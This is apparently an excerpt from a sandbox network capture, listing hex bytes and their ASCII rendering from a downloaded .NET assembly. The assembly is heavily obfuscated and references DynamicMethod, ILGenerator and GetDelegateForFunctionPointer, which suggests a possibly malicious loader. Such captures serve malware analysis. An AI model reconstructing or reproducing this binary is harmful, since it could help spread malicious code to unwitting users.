02 e2 25 0c 08 5e 02 d8 66 00 00 08 00 c3 02 8a 25 0c 08 5f 02 e8 66 00 00 08 00 c6 00 a8 17 c1 01 60 02 f8 66 00 00 08 00 c3 02 c1 25 08 08 60 02 00 67
                                        Data Ascii: e%\ef\`fR\hfR\pfR\xfRP\fRF\fR!\fS\fS]f/S-]fCS-]fWS]f?"]f%^f%_f`f%`g
                                        2021-09-27 18:36:18 UTC122INData Raw: f8 37 01 00 08 00 83 08 22 70 bf 10 02 03 0c 38 01 00 08 00 83 00 2d 70 ac 11 02 03 24 38 01 00 08 00 83 00 38 70 95 10 03 03 3c 38 01 00 08 00 83 00 43 70 ad 01 06 03 50 38 01 00 08 00 83 00 4e 70 a5 00 06 03 64 38 01 00 08 00 93 00 59 70 46 05 06 03 78 38 01 00 08 00 93 00 6d 70 1a 0f 06 03 90 38 01 00 08 00 93 00 81 70 df 14 06 03 b0 38 01 00 08 00 93 00 95 70 bc 07 06 03 c4 38 01 00 00 00 91 18 66 15 0e 01 06 03 00 00 00 00 03 00 86 18 3f 00 33 03 06 03 00 00 00 00 03 00 c6 01 21 1f 5e 16 08 03 00 00 00 00 03 00 c6 01 b8 1e 65 16 0b 03 00 00 00 00 03 00 c6 01 03 1f 84 05 10 03 cc 38 01 00 00 00 91 18 66 15 0e 01 11 03 00 00 00 00 03 00 86 18 3f 00 33 03 11 03 00 00 00 00 03 00 c6 01 21 1f 72 16 13 03 00 00 00 00 03 00 c6 01 b8 1e 7a 16 17 03 00 00 00
                                        Data Ascii: 7"p8-p$88p<8CpP8Npd8YpFx8mp8p8p8f?3!^e8f?3!rz
                                        2021-09-27 18:36:18 UTC126INData Raw: 85 01 00 08 00 10 18 66 15 0e 01 72 03 00 00 00 00 03 00 46 00 21 1f 4a 1c 72 03 d0 85 01 00 08 00 16 00 d0 87 50 1c 72 03 00 00 00 00 03 00 06 18 3f 00 33 03 72 03 e4 85 01 00 08 00 10 18 66 15 0e 01 72 03 00 00 00 00 03 00 46 00 21 1f 5e 1c 72 03 f8 85 01 00 08 00 16 00 d0 87 65 1c 72 03 00 00 00 00 03 00 06 18 3f 00 33 03 72 03 0c 86 01 00 08 00 10 18 66 15 0e 01 72 03 00 00 00 00 03 00 46 00 21 1f 74 1c 72 03 20 86 01 00 08 00 16 00 d0 87 7c 1c 72 03 00 00 00 00 03 00 06 18 3f 00 33 03 72 03 34 86 01 00 08 00 10 18 66 15 0e 01 72 03 00 00 00 00 03 00 46 00 21 1f 8c 1c 72 03 48 86 01 00 08 00 16 00 d0 87 94 1c 72 03 00 00 00 00 03 00 06 18 3f 00 33 03 72 03 5c 86 01 00 08 00 10 18 66 15 0e 01 72 03 00 00 00 00 03 00 46 00 21 1f a4 1c 72 03 70 86 01 00
                                        Data Ascii: frF!JrPr?3rfrF!^rer?3rfrF!tr |r?3r4frF!rHr?3r\frF!rp
                                        2021-09-27 18:36:18 UTC129INData Raw: 01 00 08 00 16 00 d0 87 f9 20 72 03 00 00 00 00 03 00 06 18 3f 00 33 03 72 03 b0 8e 01 00 08 00 10 18 66 15 0e 01 72 03 00 00 00 00 03 00 46 00 21 1f 09 21 72 03 c4 8e 01 00 08 00 16 00 d0 87 13 21 72 03 00 00 00 00 03 00 06 18 3f 00 33 03 72 03 d8 8e 01 00 08 00 10 18 66 15 0e 01 72 03 00 00 00 00 03 00 46 00 21 1f 25 21 72 03 ec 8e 01 00 08 00 16 00 d0 87 2e 21 72 03 00 00 00 00 03 00 06 18 3f 00 33 03 72 03 00 8f 01 00 08 00 10 18 66 15 0e 01 72 03 00 00 00 00 03 00 46 00 21 1f 3f 21 72 03 14 8f 01 00 08 00 16 00 d0 87 4a 21 72 03 00 00 00 00 03 00 06 18 3f 00 33 03 72 03 2c 8f 01 00 08 00 10 18 66 15 0e 01 72 03 00 00 00 00 03 00 46 00 21 1f 5d 21 72 03 40 8f 01 00 08 00 16 00 d0 87 6b 21 72 03 00 00 00 00 03 00 06 18 3f 00 33 03 72 03 58 8f 01 00 08
                                        Data Ascii: r?3rfrF!!r!r?3rfrF!%!r.!r?3rfrF!?!rJ!r?3r,frF!]!r@k!r?3rX
                                        2021-09-27 18:36:18 UTC133INData Raw: 00 8b 17 00 00 03 00 8b 17 00 00 01 00 8b 17 00 00 02 00 8b 17 00 00 03 00 8b 17 00 00 01 00 8b 17 00 00 02 00 8b 17 00 00 02 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 02 00 8b 17 00 00 03 00 8b 17 00 00 02 00 8b 17 00 00 01 00 8b 17 00 00 02 00 8b 17 00 00 03 00 8b 17 00 00 02 00 8b 17 00 00 02 00 8b 17 00 00 02 00 8b 17 00 00 02 00 8b 17 00 00 02 00 8b 17 00 00 02 00 8b 17 00 00 02 00 64 46 00 00 03 00 66 46 00 00 04 00 68 46 00 00 02 00 6a 46 00 00 03 00 6c 46 00 00 04 00 68 46 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 02 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 02 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17
                                        Data Ascii: dFfFhFjFlFhF
                                        2021-09-27 18:36:18 UTC137INData Raw: 31 90 b6 01 f1 00 cf 5e 43 15 e1 01 40 90 ea 22 31 02 4c 90 f0 22 31 02 11 5d a8 11 31 02 55 90 f4 22 31 02 60 90 f8 22 79 00 6b 90 fc 22 f1 00 75 90 08 08 d1 00 80 90 01 23 b1 03 92 90 08 0a d1 00 9d 90 08 23 d1 00 9d 90 0f 23 d1 00 9d 90 16 23 d1 00 9d 90 1d 23 d1 00 9d 90 24 23 d1 00 9d 90 2b 23 d1 00 9d 90 32 23 d1 00 9d 90 39 23 79 00 a8 17 c1 01 c1 01 a8 17 c1 01 91 01 a8 17 c1 01 11 02 a8 17 c1 01 51 01 cd 8e 40 23 29 02 a6 90 46 23 29 02 af 90 c5 10 21 02 a8 17 c1 01 99 01 a8 17 c1 01 59 02 c9 5b 4a 23 59 02 1a 5e 50 23 61 02 ac 5c 55 23 69 02 ac 5c 5f 23 b9 03 b8 90 69 23 d9 00 ab 5d b6 01 f1 00 c4 90 c1 01 89 02 d1 90 82 09 e1 01 e4 90 6e 23 f9 00 eb 17 75 23 e1 01 f1 90 7b 23 e1 01 ff 90 82 23 f1 00 0d 91 87 23 59 02 15 5b ad 01 21 02 1e 91 8d
                                        Data Ascii: 1^C@"1L"1]1U"1`"yk"u#####$#+#2#9#yQ@#)F#)!Y[J#Y^P#a\U#i\_#i#]n#u#{###Y[!
                                        2021-09-27 18:36:18 UTC141INData Raw: 4e 51 76 53 73 66 64 33 56 57 6c 78 4c 47 6b 71 65 6e 48 00 4e 4a 34 78 5a 32 78 48 79 47 49 38 33 38 70 50 30 69 35 00 67 49 6c 6a 68 57 78 4b 30 31 36 34 6c 32 69 44 38 70 38 00 6e 6f 59 43 4b 72 78 71 6c 30 66 4b 78 58 52 66 37 79 34 00 71 76 65 41 41 41 78 58 44 4c 74 4b 45 6c 63 4b 37 48 65 00 47 56 74 6b 58 65 78 61 72 33 4f 38 35 36 33 5a 4b 42 62 00 45 6e 75 6d 00 6c 66 4e 52 62 4f 78 72 37 50 6b 37 64 44 56 43 4a 76 52 00 63 32 62 4c 4d 63 78 52 4d 4e 62 44 31 4a 73 38 59 74 59 00 45 78 63 65 70 74 69 6f 6e 00 61 4c 42 63 56 4e 78 35 62 32 53 52 51 77 66 4a 69 41 5a 00 56 30 31 69 46 38 78 69 31 42 71 41 41 48 49 58 6b 64 33 00 4c 71 56 73 64 33 78 65 6c 71 6a 34 39 32 74 72 76 4a 54 00 45 58 46 6b 5a 6b 78 6e 73 68 71 72 75 33 79 55 68 47 6d 00
                                        Data Ascii: NQvSsfd3VWlxLGkqenHNJ4xZ2xHyGI838pP0i5gIljhWxK0164l2iD8p8noYCKrxql0fKxXRf7y4qveAAAxXDLtKElcK7HeGVtkXexar3O8563ZKBbEnumlfNRbOxr7Pk7dDVCJvRc2bLMcxRMNbD1Js8YtYExceptionaLBcVNx5b2SRQwfJiAZV01iF8xi1BqAAHIXkd3LqVsd3xelqj492trvJTEXFkZkxnshqru3yUhGm
                                        2021-09-27 18:36:18 UTC146INData Raw: 4e 48 55 56 00 77 34 4b 73 47 6e 4c 50 6f 00 4b 4f 55 79 59 63 66 6d 64 00 4e 68 56 55 4e 44 5a 42 65 00 55 73 65 72 00 61 68 73 56 73 4f 51 56 4d 00 6e 63 6f 6a 69 65 70 6a 30 59 51 62 45 58 56 58 50 4e 30 00 57 74 33 71 66 4b 43 76 31 00 51 62 32 35 4f 52 45 67 52 00 64 34 53 36 52 43 70 4f 6e 00 64 72 6b 30 75 79 63 77 38 00 4a 6b 4b 43 4d 39 63 63 49 00 52 37 5a 4f 39 72 70 63 4d 65 35 56 61 36 47 51 4c 38 76 00 62 76 74 38 75 49 70 4b 37 64 73 61 33 66 73 32 56 64 42 00 47 5a 52 78 6a 6c 70 39 36 52 49 6e 54 4f 41 43 65 47 4e 00 4d 36 50 34 45 79 70 31 53 4f 6e 78 50 72 73 6b 49 4b 73 00 76 56 66 6a 4f 30 70 6b 39 37 6b 4e 53 73 42 48 41 4d 62 00 54 32 55 30 6c 77 70 53 50 34 4c 4e 45 45 69 4b 77 64 45 00 73 37 46 42 53 43 39 68 6b 00 47 36 64 57 66
                                        Data Ascii: NHUVw4KsGnLPoKOUyYcfmdNhVUNDZBeUserahsVsOQVMncojiepj0YQbEXVXPN0Wt3qfKCv1Qb25OREgRd4S6RCpOndrk0uycw8JkKCM9ccIR7ZO9rpcMe5Va6GQL8vbvt8uIpK7dsa3fs2VdBGZRxjlp96RInTOACeGNM6P4Eyp1SOnxPrskIKsvVfjO0pk97kNSsBHAMbT2U0lwpSP4LNEEiKwdEs7FBSC9hkG6dWf
                                        2021-09-27 18:36:18 UTC150INData Raw: 6b 71 33 71 00 55 6d 6b 47 62 4d 4c 72 6f 6f 6e 71 56 70 4b 33 48 39 46 00 61 76 68 73 62 6b 4c 52 73 74 73 53 6e 69 52 5a 4f 41 69 00 73 61 64 6a 58 63 4c 35 62 77 42 52 4a 37 43 37 56 49 79 00 6c 52 38 6a 4a 4a 75 36 47 6d 00 6a 48 4b 6a 32 4b 52 61 34 38 00 45 73 64 6a 33 43 65 50 43 43 00 73 54 62 6a 7a 66 5a 36 46 78 00 6b 73 6e 6b 68 67 58 63 53 78 00 75 45 78 6b 64 58 4a 42 6d 59 00 6e 45 68 6b 78 46 41 37 57 4c 00 55 59 68 6b 5a 70 6e 6f 54 73 00 6d 78 70 6b 48 77 6b 48 42 64 00 52 47 52 6b 45 61 56 6f 68 52 00 6c 78 57 6b 66 30 52 57 62 5a 00 51 36 6e 6b 67 76 54 59 67 45 00 63 46 6e 6b 4d 56 31 51 73 58 00 4e 37 30 6b 6a 39 78 41 76 35 00 71 58 48 6b 6b 77 57 73 66 6e 00 56 46 71 6b 53 48 4f 4c 39 4c 00 6a 30 33 6b 63 53 68 44 4c 4e 00 55 70 49
                                        Data Ascii: kq3qUmkGbMLroonqVpK3H9FavhsbkLRstsSniRZOAisadjXcL5bwBRJ7C7VIylR8jJJu6GmjHKj2KRa48Esdj3CePCCsTbjzfZ6FxksnkhgXcSxuExkdXJBmYnEhkxFA7WLUYhkZpnoTsmxpkHwkHBdRGRkEaVohRlxWkf0RWbZQ6nkgvTYgEcFnkMV1QsXN70kj9xAv5qXHkkwWsfnVFqkSHOL9Lj03kcShDLNUpI
                                        2021-09-27 18:36:18 UTC154INData Raw: 45 36 66 39 68 64 32 61 4c 44 55 39 6f 68 00 79 31 50 34 6c 38 36 67 55 37 44 4e 47 45 5a 62 71 41 6a 00 71 6c 4a 79 46 71 36 4d 68 49 4b 65 59 51 53 46 62 4d 43 00 72 52 44 45 57 42 36 6a 57 62 77 63 64 78 4b 70 57 4f 44 00 4e 6e 69 49 56 48 36 6b 4d 43 59 68 4e 4a 4c 55 6e 4c 64 00 55 44 6c 50 68 42 36 53 31 48 53 6a 76 61 74 67 39 46 4e 00 51 69 43 35 78 42 36 63 69 58 78 76 37 6a 33 49 51 38 64 00 69 49 44 31 46 4a 36 4b 66 57 63 63 79 4b 79 32 67 5a 6d 00 47 4e 41 77 31 6d 36 39 53 4f 76 34 38 6d 76 67 62 65 30 00 6c 4f 51 33 6e 51 36 31 65 75 4b 51 73 59 74 5a 4f 57 38 00 79 6f 78 4c 66 4f 36 6c 37 62 66 45 4a 57 54 50 4b 69 52 00 49 6b 52 57 54 73 36 70 36 30 66 63 6a 69 65 35 4a 45 47 00 45 49 61 71 35 6b 36 4c 74 48 4c 75 41 5a 62 61 45 42 77 00
                                        Data Ascii: E6f9hd2aLDU9ohy1P4l86gU7DNGEZbqAjqlJyFq6MhIKeYQSFbMCrRDEWB6jWbwcdxKpWODNniIVH6kMCYhNJLUnLdUDlPhB6S1HSjvatg9FNQiC5xB6ciXxv7j3IQ8diID1FJ6KfWccyKy2gZmGNAw1m69SOv48mvgbe0lOQ3nQ61euKQsYtZOW8yoxLfO6l7bfEJWTPKiRIkRWTs6p60fcjie5JEGEIaq5k6LtHLuAZbaEBw
                                        2021-09-27 18:36:18 UTC158INData Raw: 5a 6d 48 30 31 39 68 00 71 31 6e 5a 46 65 75 63 55 32 00 49 35 65 5a 65 44 43 48 72 75 00 43 6f 6e 73 74 72 75 63 74 6f 72 49 6e 66 6f 00 52 75 6e 74 69 6d 65 4d 65 74 68 6f 64 48 61 6e 64 6c 65 00 41 72 69 74 68 6d 65 74 69 63 45 78 63 65 70 74 69 6f 6e 00 73 65 74 5f 49 74 65 6d 00 54 72 79 47 65 74 56 61 6c 75 65 00 4f 76 65 72 66 6c 6f 77 45 78 63 65 70 74 69 6f 6e 00 4e 75 6c 6c 52 65 66 65 72 65 6e 63 65 45 78 63 65 70 74 69 6f 6e 00 73 73 36 5a 50 70 55 6c 73 6c 00 67 37 47 45 5a 50 6a 32 79 79 00 59 77 31 45 48 65 61 65 36 6c 00 41 70 61 66 68 57 39 5a 45 75 00 44 79 6e 61 6d 69 63 4d 65 74 68 6f 64 00 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 45 6d 69 74 00 49 4c 47 65 6e 65 72 61 74 6f 72 00 45 6d 70 74 79 00 45 6d 70 74 79 54 79 70
                                        Data Ascii: ZmH019hq1nZFeucU2I5eZeDCHruConstructorInfoRuntimeMethodHandleArithmeticExceptionset_ItemTryGetValueOverflowExceptionNullReferenceExceptionss6ZPpUlslg7GEZPj2yyYw1EHeae6lApafhW9ZEuDynamicMethodSystem.Reflection.EmitILGeneratorEmptyEmptyTyp
                                        2021-09-27 18:36:18 UTC161INData Raw: 43 4e 6d 31 79 6b 50 50 75 79 62 5a 46 00 52 71 59 67 6b 69 46 6b 75 72 00 6e 39 37 77 6e 57 43 47 54 32 61 54 62 32 63 73 61 32 31 00 67 46 6a 38 33 44 4c 67 48 59 00 4a 64 56 67 66 66 35 61 74 75 00 61 57 76 67 67 76 6e 58 30 4a 00 72 74 34 67 4d 5a 45 36 51 62 00 52 67 6b 67 6a 34 52 6e 52 64 00 58 6d 34 49 46 6c 43 37 49 6e 55 48 4a 6d 47 54 5a 35 31 00 4d 39 76 75 33 70 43 74 62 6e 41 62 4c 55 65 42 68 5a 48 00 69 61 46 77 48 73 43 44 38 54 34 4d 4f 4b 74 32 6b 47 61 00 6f 34 4c 56 51 57 43 4f 56 72 71 43 47 62 66 31 6f 45 35 00 4b 74 61 30 76 6f 43 38 57 49 39 37 36 33 66 74 47 6a 69 00 52 65 6d 6f 76 65 41 74 00 62 38 44 45 71 78 43 4a 62 67 45 76 47 77 39 73 57 6d 37 00 52 44 49 71 32 41 43 32 6c 67 6c 59 4e 63 34 51 48 4d 77 00 43 54 53 4b 56 54
                                        Data Ascii: CNm1ykPPuybZFRqYgkiFkurn97wnWCGT2aTb2csa21gFj83DLgHYJdVgff5atuaWvggvnX0Jrt4gMZE6QbRgkgj4RnRdXm4IFlC7InUHJmGTZ51M9vu3pCtbnAbLUeBhZHiaFwHsCD8T4MOKt2kGao4LVQWCOVrqCGbf1oE5Kta0voC8WI9763ftGjiRemoveAtb8DEqxCJbgEvGw9sWm7RDIq2AC2lglYNc4QHMwCTSKVT
                                        2021-09-27 18:36:18 UTC165INData Raw: 6b 6b 65 47 68 45 56 6c 62 00 4e 30 53 38 32 53 63 42 54 69 41 78 33 48 54 70 70 6c 36 00 67 65 74 5f 48 61 73 68 00 69 6f 44 6e 75 62 63 36 44 51 34 41 64 33 53 39 63 49 57 00 56 65 72 69 66 79 48 61 73 68 00 6e 50 61 59 6b 58 63 57 69 58 6d 77 33 45 30 79 47 53 4e 00 76 32 72 31 33 6f 63 30 39 6b 54 6b 46 39 58 62 6b 49 30 00 6c 61 6b 47 72 36 63 75 70 61 6b 32 58 44 6a 4c 43 52 68 00 67 65 74 5f 4e 61 6d 65 00 67 49 54 62 4e 56 63 43 42 31 54 34 35 55 48 54 72 77 52 00 7a 4f 6d 34 67 75 53 65 41 33 46 4d 55 71 74 6f 56 4a 78 00 6a 4e 71 59 54 66 53 6e 78 56 41 71 64 59 72 47 64 53 4d 00 48 57 65 63 73 70 73 65 71 74 57 67 6f 4d 6c 4f 68 38 37 00 61 74 57 4a 53 4c 73 51 68 6a 4f 77 44 32 65 68 34 41 78 00 52 65 61 64 49 6e 74 50 74 72 00 44 70 4c 38 58
                                        Data Ascii: kkeGhEVlbN0S82ScBTiAx3HTppl6get_HashioDnubc6DQ4Ad3S9cIWVerifyHashnPaYkXcWiXmw3E0yGSNv2r13oc09kTkF9XbkI0lakGr6cupak2XDjLCRhget_NamegITbNVcCB1T45UHTrwRzOm4guSeA3FMUqtoVJxjNqYTfSnxVAqdYrGdSMHWecspseqtWgoMlOh87atWJSLsQhjOwD2eh4AxReadIntPtrDpL8X
                                        2021-09-27 18:36:18 UTC169INData Raw: 62 5a 6a 61 72 50 37 44 78 00 4f 35 59 6a 72 53 4b 68 79 4b 00 78 6f 48 6a 52 63 62 42 4b 4b 00 6a 36 30 6a 35 59 41 70 63 6d 00 74 54 45 6e 56 54 73 64 4b 4b 71 4d 53 78 55 45 52 32 6e 00 4a 70 6e 56 43 42 73 78 6b 42 55 48 36 35 4b 34 51 59 37 00 44 54 54 69 6e 79 73 5a 54 36 58 78 67 72 64 64 68 6a 6d 00 7a 57 79 4b 67 47 73 48 66 34 34 70 45 42 4f 61 31 57 6c 00 65 4b 34 74 71 5a 73 45 30 61 64 47 4d 52 6a 4b 37 35 6b 00 52 54 6f 78 68 56 73 66 4f 6d 49 70 66 63 59 4e 49 58 31 00 6e 50 4d 32 52 74 73 67 6a 6a 61 70 53 64 34 6b 50 54 69 00 24 24 6d 65 74 68 6f 64 30 78 36 30 30 30 33 31 61 2d 31 00 24 24 6d 65 74 68 6f 64 30 78 36 30 30 30 33 31 61 2d 32 00 24 24 6d 65 74 68 6f 64 30 78 36 30 30 30 33 33 38 2d 31 00 24 24 6d 65 74 68 6f 64 30 78 36 30
                                        Data Ascii: bZjarP7DxO5YjrSKhyKxoHjRcbBKKj60j5YApcmtTEnVTsdKKqMSxUER2nJpnVCBsxkBUH65K4QY7DTTinysZT6XxgrddhjmzWyKgGsHf44pEBOa1WleK4tqZsE0adGMRjK75kRToxhVsfOmIpfcYNIX1nPM2RtsgjjapSd4kPTi$$method0x600031a-1$$method0x600031a-2$$method0x6000338-1$$method0x60
                                        2021-09-27 18:36:18 UTC173INData Raw: 35 39 39 36 39 32 63 39 63 35 61 61 62 00 6d 5f 32 65 65 65 61 64 62 38 61 30 34 36 34 30 62 30 39 39 33 34 65 63 30 30 31 32 30 63 63 65 66 31 00 6d 5f 31 31 35 65 39 38 31 36 31 38 30 64 34 65 36 34 61 38 65 66 31 36 38 62 39 37 64 61 65 33 61 61 00 6d 5f 65 38 61 33 66 66 38 37 62 39 63 30 34 61 66 61 62 62 35 65 35 61 65 31 34 39 37 61 62 36 35 30 00 6d 5f 31 30 61 62 36 38 35 33 65 35 64 38 34 64 66 33 38 34 31 32 39 35 31 33 39 34 31 38 36 64 62 61 00 6d 5f 39 31 38 31 34 65 64 38 62 31 31 61 34 64 36 32 39 37 66 39 35 63 61 37 30 36 33 30 30 35 66 30 00 6d 5f 33 65 38 35 37 61 65 61 61 36 62 35 34 63 32 61 38 33 30 65 36 66 65 65 33 61 38 32 63 37 36 31 00 6d 5f 62 66 63 37 31 35 61 33 65 66 38 34 34 65 35 36 38 36 63 33 61 66 31 32 65 39 39 32 33
                                        Data Ascii: 599692c9c5aabm_2eeeadb8a04640b09934ec00120ccef1m_115e9816180d4e64a8ef168b97dae3aam_e8a3ff87b9c04afabb5e5ae1497ab650m_10ab6853e5d84df38412951394186dbam_91814ed8b11a4d6297f95ca7063005f0m_3e857aeaa6b54c2a830e6fee3a82c761m_bfc715a3ef844e5686c3af12e9923
                                        2021-09-27 18:36:18 UTC178INData Raw: 00 65 00 64 00 00 4b 6c 00 51 00 34 00 57 00 47 00 4e 00 64 00 6c 00 62 00 79 00 73 00 59 00 46 00 59 00 69 00 79 00 34 00 34 00 2e 00 6a 00 32 00 6d 00 4f 00 39 00 61 00 78 00 52 00 6e 00 46 00 56 00 63 00 6e 00 43 00 33 00 77 00 51 00 77 00 00 01 00 33 7b 00 31 00 31 00 31 00 31 00 31 00 2d 00 32 00 32 00 32 00 32 00 32 00 2d 00 35 00 30 00 30 00 30 00 31 00 2d 00 30 00 30 00 30 00 30 00 30 00 7d 00 00 3b 47 00 65 00 74 00 44 00 65 00 6c 00 65 00 67 00 61 00 74 00 65 00 46 00 6f 00 72 00 46 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 50 00 6f 00 69 00 6e 00 74 00 65 00 72 00 00 05 5f 00 5f 00 00 47 53 00 79 00 73 00 74 00 65 00 6d 00 2e 00 52 00 65 00 66 00 6c 00 65 00 63 00 74 00 69 00 6f 00 6e 00 2e 00 52 00 65 00 66 00 6c 00 65 00 63 00 74 00 69 00
                                        Data Ascii: edKlQ4WGNdlbysYFYiy44.j2mO9axRnFVcnC3wQw3{11111-22222-50001-00000};GetDelegateForFunctionPointer__GSystem.Reflection.Reflecti
                                        2021-09-27 18:36:18 UTC182INData Raw: 13 00 13 01 08 20 02 02 13 00 10 13 01 01 00 0a 20 03 12 74 12 74 11 80 90 02 05 20 01 12 74 08 05 00 01 08 12 79 0d 07 07 08 12 81 55 12 81 59 08 08 08 08 04 06 1d 12 79 0a 20 04 01 0e 12 79 1d 12 79 02 08 15 12 81 3d 02 12 79 08 04 06 11 81 5d 06 20 02 01 08 12 74 35 07 16 08 12 81 35 12 80 f9 1d 12 80 f5 1d 1c 1d 12 74 15 12 80 9d 01 12 80 d0 12 80 d4 08 08 12 80 f5 12 79 1c 02 12 80 b0 12 80 d8 1c 12 74 12 79 1c 08 12 74 07 00 02 12 80 d8 1c 02 28 07 11 12 80 d8 12 80 f9 12 81 55 12 81 59 1d 12 80 f5 1d 12 79 08 08 1d 12 81 65 08 08 08 12 79 08 12 80 d8 1d 12 79 08 0b 15 12 81 3d 02 12 81 35 12 80 d8 02 1d 1c 08 00 03 12 80 d8 1c 02 1c 2e 07 13 12 80 d8 12 80 f9 12 81 55 12 81 59 08 1d 12 79 08 08 1d 12 81 65 08 08 08 12 80 d0 12 79 08 12 80 d0 12 80
                                        Data Ascii: tt tyUYy yy=y] t55tytyt(UYyeyy=5.UYyey
                                        2021-09-27 18:36:18 UTC186INData Raw: 02 1c 12 79 09 09 00 03 1c 12 79 09 12 82 8c 04 06 12 82 90 06 20 02 1c 12 79 06 09 00 03 1c 12 79 06 12 82 90 04 06 12 82 94 06 20 02 1c 12 79 07 09 00 03 1c 12 79 07 12 82 94 04 06 12 82 98 06 20 02 1c 12 79 05 09 00 03 1c 12 79 05 12 82 98 04 06 12 82 9c 06 20 02 1c 12 79 04 09 00 03 1c 12 79 04 12 82 9c 04 06 12 82 a0 06 20 02 1c 12 79 0a 09 00 03 1c 12 79 0a 12 82 a0 04 06 12 82 a4 06 20 02 1c 12 79 0b 09 00 03 1c 12 79 0b 12 82 a4 04 06 12 82 a8 05 20 01 0e 10 08 08 00 02 0e 10 08 12 82 a8 04 06 12 82 ac 05 20 01 0e 10 09 08 00 02 0e 10 09 12 82 ac 04 06 12 82 b0 05 20 01 0e 10 0a 08 00 02 0e 10 0a 12 82 b0 04 06 12 82 b4 05 20 01 0e 10 0b 08 00 02 0e 10 0b 12 82 b4 04 06 12 82 b8 05 20 01 0f 01 18 08 00 02 0f 01 18 12 82 b8 04 06 12 82 bc 05 20 01
                                        Data Ascii: yy yy yy yy yy yy yy
                                        2021-09-27 18:36:18 UTC190INData Raw: 87 03 50 82 01 28 12 83 01 7a 82 01 50 16 7a 83 01 2a 50 a4 02 50 90 01 28 12 83 01 7a 82 01 50 16 7a 83 01 2a 50 ae 01 50 b9 01 8d 12 83 01 7a 82 01 50 17 7a 83 01 2a 50 8a 02 50 2e 28 12 83 01 7a 82 01 50 17 7a 83 01 2a 7a 82 01 50 17 50 85 02 50 01 8d 2a 50 b5 02 50 3c 28 12 83 01 7a 82 01 50 18 7a 83 01 2a 50 1b 50 9b 01 8d 12 83 01 7a 82 01 50 18 7a 83 01 2a 50 a4 03 50 8c 01 28 12 83 01 7a 82 01 50 18 7a 83 01 2a 50 a5 03 50 8c 01 28 12 83 01 7a 82 01 50 18 7a 83 01 2a 50 03 50 2a 8d 12 83 01 7a 82 01 50 18 7a 83 01 2a 50 86 01 50 13 28 12 83 01 7a 82 01 50 18 7a 83 01 2a 7a 82 01 50 19 50 31 50 ae 01 8d 2a 50 0e 50 3b 8d 12 83 01 7a 82 01 50 19 7a 83 01 2a 50 02 50 10 8d 12 83 01 7a 82 01 50 19 7a 83 01 2a 50 b3 02 50 91 01 28 12 83 01 7a 82 01 50
                                        Data Ascii: P(zPz*PP(zPz*PPzPz*PP.(zPz*zPPP*PP<(zPz*PPzPz*PP(zPz*PP(zPz*PP*zPz*PP(zPz*zPP1P*PP;zPz*PPzPz*PP(zP
                                        2021-09-27 18:36:18 UTC193INData Raw: 2f b9 45 a7 3d 89 49 95 20 8d 4b a2 2b 92 2f 88 22 8e 46 a4 4a 97 47 82 3f a8 27 b0 22 bd 2f 80 35 be 3f 81 2a a9 2b 9f 2e 88 33 bf 21 8c 37 91 45 8d 39 af 33 88 4c 8a 2d b9 32 84 40 97 21 97 26 90 41 be 4a 87 1f 92 22 8d 21 a3 21 be 45 89 34 b7 47 a7 2a bf 40 89 23 91 49 9f 2d 8e 36 aa 40 95 4c 85 25 80 3e b0 48 a5 22 8e 4c 80 4a 9c 30 b8 43 ad 39 a8 3a 8b 27 b9 34 80 2f bb 44 9e 2a 92 37 a9 26 b9 25 a8 35 ae 3e bf 37 be 30 9b 36 ba 4c 9e 1f 92 48 a8 48 a2 34 bb 31 88 3c 96 23 a8 28 95 39 b2 28 87 3d a6 3e 9f 3d b7 39 b9 37 87 48 b0 2a ba 48 9f 4b a8 4b 98 34 b7 2e b6 23 b9 3e a2 31 80 2b a1 35 b0 4b 84 3a 9f 47 98 24 88 41 b9 3d a3 30 90 3c b9 26 81 23 8f 26 bd 35 a4 36 8e 33 86 46 9d 2f 9d 3f 9f 43 97 32 92 3f 87 29 83 49 8c 3f bb 2c 8c 2a 9a 42 a6 45
                                        Data Ascii: /E=I K+/"FJG?'"/5?*+.3!7E93L-2@!&AJ"!!E4G*@#I-6@L%>H"LJ0C9:'4/D*7&%5>706LHH41<#(9(=>=97H*HKK4.#>1+5K:G$A=0<&#&563F/?C2?)I?,*BE
                                        2021-09-27 18:36:18 UTC197INData Raw: 01 50 0b 50 16 50 90 01 8d 2a 50 b8 02 32 bf 1e 7a 06 50 1a 50 93 03 50 86 01 28 2a 50 84 01 32 bf 1e 7a 06 50 05 7a 0d 2a 50 0e 12 0f 32 be 1e 7a 01 50 0f 7a 17 2a 50 a1 04 22 8a 95 80 60 16 bf 1e 90 32 be 1e 7a 06 50 13 7a 0d 2a 50 ac 05 22 8a 95 80 60 16 bf 1e 90 32 be 1e 7a 06 50 15 50 21 50 ba 01 8d 2a 50 11 32 bf 1e 7a 06 50 16 50 b5 01 50 98 01 8d 2a 50 80 02 12 0f 32 be 1e 50 88 02 50 8b 01 28 12 0d 50 91 03 22 89 95 80 60 76 bf 1e 90 32 be 1e 50 8f 02 50 2f 28 12 0c 50 9e 02 32 bf 1e 7a 03 7a 0e 85 07 5b b9 25 50 85 02 22 8a 95 80 60 16 bf 1e 90 32 be 1e 7a 01 50 01 7a 17 2a 50 a2 02 12 0f 32 be 1e 50 aa 03 50 8e 01 28 12 0d 50 a3 02 32 bf 1e 7a 06 50 18 7a 0c 2a 50 93 03 32 bf 1e 50 8b 03 50 83 01 28 12 0d 50 82 03 32 bf 1e 7a 01 50 0c 50 9f 02
                                        Data Ascii: PPP*P2zPPP(*P2zPz*P2zPz*P"`2zPz*P"`2zPP!P*P2zPPP*P2PP(P"`v2PP/(P2zz[%P"`2zPz*P2PP(P2zPz*P2PP(P2zPP
